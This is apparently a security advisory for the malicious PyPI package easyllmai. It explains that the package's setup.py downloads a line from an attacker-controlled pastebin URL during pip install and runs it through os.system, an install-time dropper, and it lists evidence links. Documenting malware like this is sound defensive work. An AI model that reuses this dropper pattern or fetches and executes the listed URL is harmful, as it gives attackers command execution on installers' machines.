Malicious code in easyllmai (PyPI)
MAL-2026-5766
Published ยท Modified
Description
__
Source: amazon-inspector (4589bbb71e0bb3589a162bf2102bba5e8bf7124d3988235647d1e3c1d01821d0)
During pip install, setup.py performs an unauthenticated HTTP fetch of https://pastebin.com/raw/yBcUM1QB, takes the first line of the response, and passes it directly to os.system(f'cmd /c "{cmd_pastebin}"'). The remote content is hosted on an anonymous, mutable, attacker-controlled paste with no pinning, no hash check, and no signature verification. Whoever controls the paste obtains arbitrary command execution on every installer's machine at install time. This is a canonical install-time dropper pattern: lifecycle-time outbound fetch from an unverified source piped straight into the OS shell.
Source: kam193 (b7ac8db348471011dee14fad41b2d0a487f08463c10c678625fe8184e8088e0a)
During installation, the code attempts to download and start a malicious executable.
Likely related to 2025-08-raknet-testing-package.
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-06-easyaillm
Reasons (based on the campaign):
Downloads and executes a remote executable.
obfuscation
malware
References
- EVIDENCE https://www.virustotal.com/gui/file/1a5beab4a6facb46b4afc5f8526e1327e6c7d740ccaf34c6a921ac18eff29427/detection
- EVIDENCE https://www.virustotal.com/gui/file/4c99c8edfc4444f46932f14afccb2952a3850df765765f9ac793d69f318c192f/detection
- EVIDENCE https://www.virustotal.com/gui/file/0649f50ead3695f41c1243883200bdb775410bcd8c8fb88277740a625a154e25
- WEB https://bad-packages.kam193.eu/pypi/package/easyllmai
- PACKAGE https://pypi.org/project/easyllmai/2.21/
Ready to move
Start Securing
Free, no credit card | First findings in minutes